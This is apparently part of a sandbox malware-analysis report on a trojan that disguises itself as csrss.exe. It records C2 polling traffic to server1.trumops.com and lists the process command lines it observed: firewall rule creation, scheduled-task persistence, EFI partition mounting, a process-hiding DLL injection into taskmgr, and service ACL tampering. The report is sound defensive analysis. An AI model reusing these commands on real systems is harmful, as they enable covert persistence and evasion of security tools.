                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    3 | 192.168.2.4 | 49841 | 104.21.79.9 | 443 | C:\Windows\rss\csrss.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    2021-10-18 06:02:44 UTC | 24 | OUT | POST /api/poll HTTP/1.1
                                                                    Host: server1.trumops.com
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
                                                                    Content-Length: 660
                                                                    Accept-Encoding: gzip
                                                                    2021-10-18 06:03:33 UTC | 24 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Mon, 18 Oct 2021 06:03:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-powered-by: PHP/8.0.11
                                                                    set-cookie: PHPSESSID=c736gp74eq681lbg8qrkf25c2s; path=/; HttpOnly
                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                    pragma: no-cache
                                                                    access-control-allow-credentials: false
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjJp%2FH0fSWWxfTYWA7zwRjoI7bZtPkocfoGHJ4e5RX%2F3mAoDoWRTLYBA3mWnjETR%2BBkl%2FDm6Z0fAvwUS%2BQfOW4pgeSWwqn4UzdBrsoE6VxOMsXgBWzJHovfUijYMuRV4nPXXU1Rs"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 69ff8f3c3c80701c-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                    Code Manipulations

                                                                    Statistics

                                                                    [Charts: CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior]

                                                                    System Behavior

                                                                    General

                                                                    Start time:08:01:16
                                                                    Start date:18/10/2021
                                                                    Path:C:\Users\user\Desktop\jkDmft1Qoe.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\jkDmft1Qoe.exe'
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000000.657671023.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000000.657671023.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:08:01:19
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\servicing\TrustedInstaller.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                                    Imagebase:0x7ff760fb0000
                                                                    File size:131584 bytes
                                                                    MD5 hash:4578046C54A954C917BB393B70BA0AEB
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:08:01:20
                                                                    Start date:18/10/2021
                                                                    Path:C:\Users\user\Desktop\jkDmft1Qoe.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\jkDmft1Qoe.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.678501947.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000004.00000002.678501947.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:08:01:22
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
                                                                    Imagebase:0x7ff622070000
                                                                    File size:273920 bytes
                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:08:01:22
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:08:01:23
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\netsh.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
                                                                    Imagebase:0x7ff69ecb0000
                                                                    File size:92672 bytes
                                                                    MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:08:01:24
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe ''
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 0000000A.00000002.927094203.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000002.927094203.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Windows\rss\csrss.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 34%, Metadefender, Browse
                                                                    • Detection: 47%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Start time:08:01:27
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
                                                                    Imagebase:0x7ff723590000
                                                                    File size:226816 bytes
                                                                    MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:08:01:27
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:08:01:27
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                                    Imagebase:0x7ff723590000
                                                                    File size:226816 bytes
                                                                    MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:08:01:28
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:08:01:28
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000011.00000002.699181667.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000002.699181667.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:08:01:28
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\mountvol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:mountvol B: /s
                                                                    Imagebase:0x11e0000
                                                                    File size:15360 bytes
                                                                    MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:08:01:29
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:29
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\mountvol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:mountvol B: /d
                                                                    Imagebase:0x11e0000
                                                                    File size:15360 bytes
                                                                    MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:30
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:30
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000016.00000002.701157645.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000016.00000002.701157645.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:08:01:30
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\mountvol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:mountvol B: /s
                                                                    Imagebase:0x11e0000
                                                                    File size:15360 bytes
                                                                    MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:31
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:35
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\rss\csrss.exe'
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000019.00000002.706417494.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000019.00000002.706417494.0000000000991000.00000008.00020000.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:08:01:35
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\mountvol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:mountvol B: /d
                                                                    Imagebase:0x11e0000
                                                                    File size:15360 bytes
                                                                    MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:35
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 0000001C.00000000.702563257.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000000.702563257.000000000098A000.00000008.00020000.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:08:01:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\shutdown.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:shutdown -r -t 5
                                                                    Imagebase:0x880000
                                                                    File size:23552 bytes
                                                                    MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff6eb840000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:43
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\rss\csrss.exe'
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000020.00000002.722563004.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000020.00000002.722563004.0000000000991000.00000008.00020000.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:08:01:45
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000022.00000000.719194989.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000000.719194989.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000022.00000002.723109037.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000002.723109037.0000000000991000.00000008.00020000.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:08:01:46
                                                                    Start date:18/10/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                    Imagebase:0x7ff614880000
                                                                    File size:288256 bytes
                                                                    MD5 hash:D98E33B66343E7C96158444127A117F6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 14%, Metadefender, Browse
                                                                    • Detection: 73%, ReversingLabs

                                                                    General

                                                                    Start time:08:01:46
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:01:47
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff6eb840000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:02:02
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff6eb840000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:02:15
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff6eb840000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:02:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\windefender.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\windefender.exe
                                                                    Imagebase:0x400000
                                                                    File size:2102272 bytes
                                                                    MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 41%, ReversingLabs

                                                                    General

                                                                    Start time:08:02:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:02:38
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                    Imagebase:0x11d0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:02:38
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                    Imagebase:0x360000
                                                                    File size:60928 bytes
                                                                    MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:08:02:39
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\windefender.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\windefender.exe
                                                                    Imagebase:0x400000
                                                                    File size:2102272 bytes
                                                                    MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Disassembly

                                                                    Code Analysis

                                                                      Executed Functions

                                                                      Non-executed Functions

                                                                      Strings
                                                                      • ", xrefs: 00428CF9
                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                      • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                      • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                      • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.665663316.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
